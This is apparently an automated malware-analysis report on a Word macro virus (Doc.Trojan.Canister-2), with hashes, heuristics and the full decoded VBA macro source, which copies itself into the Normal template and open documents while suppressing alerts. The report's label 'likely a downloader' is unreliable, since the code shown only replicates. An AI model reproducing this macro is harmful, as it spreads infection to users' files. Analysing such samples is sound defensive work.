Office (OLE) malware analysis — malicious · 06de0386d5ba35dd

MALICIOUS

Office (OLE)

29.0 KB Created: 2003-08-16 15:45:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14

MD5: 1c1d84ee03a1ff6f892e3fbf6ce8041e SHA-1: ccd2a46ce0d124f8442ed3bb0ce50568dd1df4c2 SHA-256: 06de0386d5ba35dd0e3a31dec758ee441c187c2d12dfe9de93cd30981c1bf671

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature Doc.Trojan.Canister-2. Static analysis revealed the presence of VBA macros within the document. The macro code appears to be obfuscated, making it difficult to determine its exact functionality, but it is designed to manipulate the document's VBA project and potentially execute further actions. The primary function seems to be related to the obfuscation and execution of malicious code, likely a downloader.

Heuristics 2

ClamAV: Doc.Trojan.Canister-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Canister-2
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1918 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1918 bytes
SHA-256: `8f25f7c25369cdd1bcf6ca94ab901d274d71d625dd9056d5f1791e3ae67a3b3d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Private Sub Document_close() 'WMXP.CaniSter.B by Kernel32 IFUPD01: Randomize Timer: XQVMO = (False * False): GQVQQ = (True / True): GoTo IFUPD02 IFUPD02: Set SXCQI = VBE.ActiveCodePane.CodeModule: GoTo IFUPD03 IFUPD03: SVJKH = SXCQI.lines(GQVQQ, SXCQI.countoflines): GoSub IFUPD12: GoTo IFUPD04 IFUPD04: With Application: .DisplayStatusBar = XQVMO: .DisplayAlerts = wdAlertsNone: End With: GoTo IFUPD05 IFUPD05: With Application: .EnableCancelKey = wdCancelDisabled: .Options.ConfirmConversions = XQVMO: End With: GoTo IFUPD06 IFUPD06: With Options: .Application.ScreenUpdating = XQVMO: .SaveNormalPrompt = XQVMO: End With: GoTo IFUPD07: IFUPD07: Set MELCQ = Normal.ThisDocument.VBProject.vbcomponents(GQVQQ).CodeModule: GoTo IFUPD08 IFUPD08: MELCQ.deletelines GQVQQ, MELCQ.countoflines: GoTo IFUPD09 IFUPD09: MELCQ.addfromstring SVJKH: GoTo IFUPD10 IFUPD10: Set PNKFC = ActiveDocument.VBProject.vbcomponents(GQVQQ).CodeModule: GoTo IFUPD11 IFUPD11: PNKFC.deletelines GQVQQ, PNKFC.countoflines: PNKFC.addfromstring SVJKH: GoTo IFUPD18 IFUPD12: Dim HHJHS(20) As String: GoTo IFUPD13 IFUPD13: HHJHS(1) = "SXCQI": HHJHS(2) = "XQVMO": HHJHS(3) = "GQVQQ": GoTo IFUPD14 IFUPD14: HHJHS(4) = "SVJKH": HHJHS(5) = "MELCQ": HHJHS(6) = "PNKFC": GoTo IFUPD15 IFUPD15: HHJHS(7) = "HHJHS": HHJHS(8) = "IFUPD": HHJHS(9) = "AATRU": GoTo IFUPD16 IFUPD16: AATRU = Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65): GoTo IFUPD17 IFUPD17: SVJKH = Replace(SVJKH, HHJHS(Int(Rnd * 9) + 1), AATRU): Return IFUPD18: End End Sub

SHA-256: 8f25f7c25369cdd1bcf6ca94ab901d274d71d625dd9056d5f1791e3ae67a3b3d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Sub Document_close() 'WMXP.CaniSter.B by Kernel32
IFUPD01: Randomize Timer: XQVMO = (False * False): GQVQQ = (True / True): GoTo IFUPD02
IFUPD02: Set SXCQI = VBE.ActiveCodePane.CodeModule: GoTo IFUPD03
IFUPD03: SVJKH = SXCQI.lines(GQVQQ, SXCQI.countoflines): GoSub IFUPD12: GoTo IFUPD04
IFUPD04: With Application: .DisplayStatusBar = XQVMO: .DisplayAlerts = wdAlertsNone: End With: GoTo IFUPD05
IFUPD05: With Application: .EnableCancelKey = wdCancelDisabled: .Options.ConfirmConversions = XQVMO: End With: GoTo IFUPD06
IFUPD06: With Options: .Application.ScreenUpdating = XQVMO: .SaveNormalPrompt = XQVMO: End With: GoTo IFUPD07:
IFUPD07: Set MELCQ = Normal.ThisDocument.VBProject.vbcomponents(GQVQQ).CodeModule: GoTo IFUPD08
IFUPD08: MELCQ.deletelines GQVQQ, MELCQ.countoflines: GoTo IFUPD09
IFUPD09: MELCQ.addfromstring SVJKH: GoTo IFUPD10
IFUPD10: Set PNKFC = ActiveDocument.VBProject.vbcomponents(GQVQQ).CodeModule: GoTo IFUPD11
IFUPD11: PNKFC.deletelines GQVQQ, PNKFC.countoflines: PNKFC.addfromstring SVJKH: GoTo IFUPD18
IFUPD12: Dim HHJHS(20) As String: GoTo IFUPD13
IFUPD13: HHJHS(1) = "SXCQI": HHJHS(2) = "XQVMO": HHJHS(3) = "GQVQQ": GoTo IFUPD14
IFUPD14: HHJHS(4) = "SVJKH": HHJHS(5) = "MELCQ": HHJHS(6) = "PNKFC": GoTo IFUPD15
IFUPD15: HHJHS(7) = "HHJHS": HHJHS(8) = "IFUPD": HHJHS(9) = "AATRU": GoTo IFUPD16
IFUPD16: AATRU = Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65): GoTo IFUPD17
IFUPD17: SVJKH = Replace(SVJKH, HHJHS(Int(Rnd * 9) + 1), AATRU): Return
IFUPD18: End
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.